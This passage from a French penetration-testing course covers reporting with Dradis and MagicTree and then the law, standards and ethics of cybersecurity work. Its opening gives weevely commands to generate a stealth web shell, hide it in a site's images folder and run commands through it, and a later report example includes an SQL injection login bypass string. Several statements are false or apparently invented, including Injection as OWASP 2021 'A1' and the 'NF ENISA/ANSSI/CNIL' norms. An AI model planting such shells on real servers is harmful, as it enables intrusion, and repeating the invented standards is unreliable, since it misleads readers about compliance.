qui permet de créer et de gérer des web shells furtifs sur une cible. Par exemple, vous
pouvez lancer la commande suivante:

weevely generate password [Link]

Cette commande va générer un web shell nommé [Link], protégé par le mot de passe
password. Vous pouvez ensuite uploader ce fichier sur le serveur web, par exemple dans le
répertoire images du site e-commerce.

upload [Link] /var/www/html/images/[Link]

Cette commande va uploader le fichier [Link] dans le répertoire /var/www/html/images/


du serveur web.

Vous pouvez ensuite accéder au web shell en utilisant l’URL du fichier et en entrant le mot
de passe.

weevely [Link] password

Cette commande va ouvrir une session weevely sur le web shell. Vous pouvez alors
exécuter des commandes PHP ou Linux sur le serveur web.
4.5 Le rapport: documenter et présenter les résultats

Le rapport est la dernière étape d’un test de pénétration. Elle consiste à documenter et à
présenter les résultats du test, afin de rendre compte des vulnérabilités trouvées, des
exploits réalisés, des données extraites, et des recommandations pour améliorer la sécurité.
L’objectif est de sensibiliser le client, de lui fournir des preuves tangibles, et de lui proposer
des solutions adaptées.

Il existe plusieurs types de rapport, selon le niveau de détail et le public visé. Par exemple,
on peut réaliser un rapport technique, un rapport managérial, un rapport exécutif, etc. On
peut aussi réaliser un rapport écrit, un rapport oral, un rapport vidéo, etc.

Imaginons que vous ayez réalisé un test de pénétration sur le site web d’une entreprise
nommée IT-Connect, qui propose des services informatiques.

Un exemple de rapport technique est d’utiliser l’outil Dradis, disponible sur Kali Linux, qui
permet de créer et de gérer des rapports de sécurité. Par exemple, vous pouvez lancer la
commande suivante:

dradis

Cette commande va démarrer le serveur Dradis et afficher l’URL du panneau de contrôle,


qui permet de créer et d’éditer des projets de rapport.

Vous pouvez ensuite accéder au panneau de contrôle en utilisant l’URL indiquée et en


entrant les identifiants par défaut (admin/admin).

[Link]

Cette URL va ouvrir le panneau de contrôle Dradis dans votre navigateur web.

Vous pouvez alors créer un nouveau projet de rapport en cliquant sur le bouton “New
project” et en entrant le nom du projet (par exemple IT-Connect).

Vous pouvez ensuite ajouter des informations au projet en utilisant les onglets “Issues”,
“Evidence”, “Notes”, “Nodes”, etc.

Par exemple, vous pouvez ajouter une vulnérabilité SQLi que vous avez trouvée sur le site
web IT-Connect en cliquant sur l’onglet “Issues” et en cliquant sur le bouton “New issue”.

Vous pouvez alors entrer les informations relatives à la vulnérabilité, comme le titre (par
exemple SQL Injection), la description (par exemple The login page of the website is
vulnerable to SQL injection), la solution (par exemple Use parameterized queries or
prepared statements to prevent SQL injection), la référence (par exemple OWASP Top 10
2021 - A1: Injection), etc.

Vous pouvez ensuite ajouter une preuve de la vulnérabilité en cliquant sur l’onglet
“Evidence” et en cliquant sur le bouton “New evidence”.
Vous pouvez alors entrer les informations relatives à la preuve, comme le nom du noeud
(par exemple [Link]), la demande (par exemple username=admin’ or
‘1’='1&password=test), la réponse (par exemple Welcome admin!), la capture d’écran (par
exemple [Link]), etc.

Vous pouvez répéter ces étapes pour chaque vulnérabilité que vous avez trouvée sur le site
web IT-Connect.

Vous pouvez ensuite générer un rapport au format PDF en cliquant sur l’onglet “Reports” et
en cliquant sur le bouton “Generate report”.

Vous pouvez alors choisir le modèle de rapport à utiliser (par exemple OWASP Testing
Guide v4) et cliquer sur le bouton “Download”.

Vous obtenez ainsi un rapport technique au format PDF qui contient les informations
relatives aux vulnérabilités trouvées sur le site web IT-Connect.

Un autre exemple de rapport managérial est d’utiliser l’outil MagicTree, disponible sur Kali
Linux, qui permet de créer et de gérer des rapports de sécurité. Par exemple, vous pouvez
lancer la commande suivante:

magictree

Cette commande va démarrer l’interface graphique MagicTree.

Vous pouvez ensuite créer un nouveau projet de rapport en cliquant sur le menu “File” et en
cliquant sur l’option “New”.

Vous pouvez alors entrer le nom du projet (par exemple IT-Connect) et cliquer sur le bouton
“OK”.

Vous pouvez ensuite importer des données au projet en cliquant sur le menu “File” et en
cliquant sur l’option “Import”.

Vous pouvez alors choisir le type de données à importer (par exemple nmap XML output) et
sélectionner le fichier correspondant (par exemple [Link]).

Vous obtenez ainsi un arbre qui contient les informations relatives au scan nmap que vous
avez réalisé sur le site web IT-Connect.

Vous pouvez répéter ces étapes pour chaque type de données que vous voulez importer au
projet.

Vous pouvez ensuite générer un rapport au format DOCX en cliquant sur le menu “File” et
en cliquant sur l’option “Export”.
Vous pouvez alors choisir le modèle de rapport à utiliser (par exemple OWASP Testing
Guide v4) et sélectionner le fichier de destination (par exemple [Link]).

Vous obtenez ainsi un rapport managérial au format DOCX qui contient les informations
relatives au test de pénétration que vous avez réalisé sur le site web IT-Connect.

Chapitre 5: Les aspects légaux de la cybersécurité

Dans ce chapitre, vous allez apprendre à connaître les aspects légaux de la cybersécurité,
c’est-à-dire les lois, les normes, l’éthique et la responsabilité qui encadrent l’activité des
professionnels du domaine. Vous allez aussi apprendre à respecter la législation en vigueur
et à protéger vos droits.

5.1 Les lois applicables à la cybersécurité

La cybersécurité est régie par un ensemble de lois qui visent à protéger les données, les
systèmes, les réseaux et les personnes contre les cyberattaques, les cybercrimes et les
cybermenaces. Ces lois peuvent être de nature internationale, régionale, nationale ou
locale, selon le contexte et le périmètre d’application. Par exemple, il existe des conventions
internationales comme la Convention de Budapest sur la cybercriminalité, des directives
européennes comme le Règlement général sur la protection des données (RGPD), des lois
nationales comme la loi française Informatique et Libertés ou la loi américaine Computer
Fraud and Abuse Act (CFAA), ou encore des règlements locaux comme la loi québécoise
sur la protection des renseignements personnels dans le secteur privé. Il est important de
connaître et de respecter les lois applicables à la cybersécurité dans le cadre de votre
activité professionnelle, car elles peuvent avoir des conséquences juridiques, financières ou
réputationnelles en cas de non-conformité ou de violation.

5.2 Les normes internationales et nationales en matière de cybersécurité

Outre les lois, il existe également des normes internationales et nationales qui visent à
établir des bonnes pratiques et des standards techniques en matière de cybersécurité. Ces
normes peuvent être élaborées par des organisations internationales, des organismes
professionnels ou des autorités nationales.

Parmi les normes internationales les plus connues, on peut citer:

La norme ISO/CEI 27001:2013 sur le management de la sécurité de l’information (SMSI),


qui spécifie les exigences pour établir, mettre en œuvre, maintenir et améliorer un SMSI
dans le contexte d’une organisation.
La norme ISO/CEI 27032:2012 sur les lignes directrices pour la cybersécurité, qui fournit
des recommandations pour améliorer la sécurité et la résilience des activités dans le
cyberespace.
La norme ISO/CEI 29100:2011 sur les principes directeurs relatifs à la protection de la vie
privée dans les technologies de l’information, qui énonce les principes à respecter pour
assurer la protection des données à caractère personnel dans le contexte des TIC.
Parmi les normes nationales les plus connues, on peut citer:

La norme NF ENISA 2016 sur les bonnes pratiques pour la sécurité des réseaux et des
systèmes d’information, qui reprend les recommandations de l’Agence européenne chargée
de la sécurité des réseaux et de l’information (ENISA) pour mettre en œuvre la directive NIS.
La norme NF ANSSI 2019 sur les règles générales de sécurité des systèmes d’information
d’importance vitale (SIIV), qui reprend les prescriptions de l’Agence nationale de la sécurité
des systèmes d’information (ANSSI) pour protéger les SIIV contre les cyberattaques.
La norme NF CNIL 2020 sur les recommandations pour la sécurité des données
personnelles, qui reprend les conseils de la Commission nationale de l’informatique et des
libertés (CNIL) pour se conformer au RGPD et assurer un niveau de sécurité adapté aux
données personnelles.

5.3 L’éthique professionnelle et personnelle

L’éthique est l’ensemble des principes et des valeurs qui guident les actions et les décisions
des individus et des organisations. L’éthique professionnelle concerne les règles de conduite
et les devoirs qui s’imposent aux professionnels de la cybersécurité dans l’exercice de leur
métier. L’éthique personnelle concerne les convictions et les choix moraux qui relèvent de la
conscience individuelle.

L’éthique professionnelle et personnelle est essentielle pour la cybersécurité, car elle permet
de garantir le respect des droits fondamentaux, la protection des données personnelles, la
confiance des utilisateurs, la prévention des abus et des fraudes, et la responsabilité sociale.
Elle implique également de respecter les codes de déontologie, les chartes éthiques, les
normes techniques, et les lois applicables.

Les professionnels de la cybersécurité doivent donc faire preuve d’intégrité, de compétence,


de loyauté, de confidentialité, d’impartialité, de prudence, et de respect envers leurs clients,
leurs employeurs, leurs collègues, et la société. Voici quelques exemples concrets
d’application de ces principes:

Un expert en cybersécurité doit informer son client des risques potentiels liés à son système
d’information, lui proposer des solutions adaptées à ses besoins, et lui fournir un service de
qualité.
Un analyste en cybersécurité doit respecter les données personnelles qu’il traite dans le
cadre de son activité, ne pas les divulguer à des tiers non autorisés, ni les utiliser à des fins
malveillantes ou illégales.
Un consultant en cybersécurité doit être loyal envers son employeur, ne pas entrer en conflit
d’intérêts avec d’autres parties, ni dénigrer ses concurrents.
Un chercheur en cybersécurité doit être impartial dans ses travaux, ne pas falsifier ni plagier
ses résultats, ni violer les droits d’auteur ou les brevets d’autrui.
Un hacker éthique doit être prudent dans ses actions, ne pas causer de dommages aux
systèmes qu’il teste, ni porter atteinte à la sécurité ou à la vie privée d’autrui.
Un formateur en cybersécurité doit être respectueux envers ses apprenants, leur transmettre
des connaissances utiles et actualisées, et favoriser leur autonomie et leur esprit critique.
5.4 La responsabilité civile et pénale

La responsabilité est l’obligation de répondre de ses actes et d’en assumer les


conséquences. La responsabilité civile concerne la réparation des dommages causés à
autrui par une faute, une négligence ou une imprudence. La responsabilité pénale concerne
la sanction des infractions commises par une personne en violation de la loi.

Les professionnels de la cybersécurité sont soumis à la responsabilité civile et pénale, en


fonction de la nature et de la gravité des dommages qu’ils peuvent causer ou subir dans le
cadre de leur activité. Ils doivent donc être conscients des risques qu’ils encourent et des
droits qu’ils ont.

La responsabilité civile peut être engagée si un professionnel de la cybersécurité cause un


préjudice à son client, à son employeur, à un tiers, ou à lui-même, par exemple en cas de:

Défaillance ou mauvaise exécution du contrat


Violation de la confidentialité ou du secret professionnel
Atteinte à la réputation ou à l’image
Perte ou altération des données
Intrusion ou sabotage du système d’information
Transmission de virus ou de logiciels malveillants
La responsabilité pénale peut être engagée si un professionnel de la cybersécurité commet
une infraction à la loi, par exemple en cas de:

Escroquerie, abus de confiance, faux ou usage de faux


Vol, détournement, recel ou destruction de données
Accès frauduleux ou maintien frauduleux dans un système d’information
Entrave au fonctionnement ou modification du système d’information
Atteinte au secret des correspondances ou à la vie privée
Contrefaçon, piratage, ou violation des droits d’auteur
La responsabilité civile et pénale peut être évitée ou limitée si le professionnel de la
cybersécurité respecte les principes éthiques, les normes techniques, et les lois applicables,
ainsi que les clauses contractuelles qui définissent les obligations et les garanties des
parties. Il peut également souscrire une assurance professionnelle qui couvre les risques
liés à son activité.
COLONIE

Vous aimerez peut-être aussi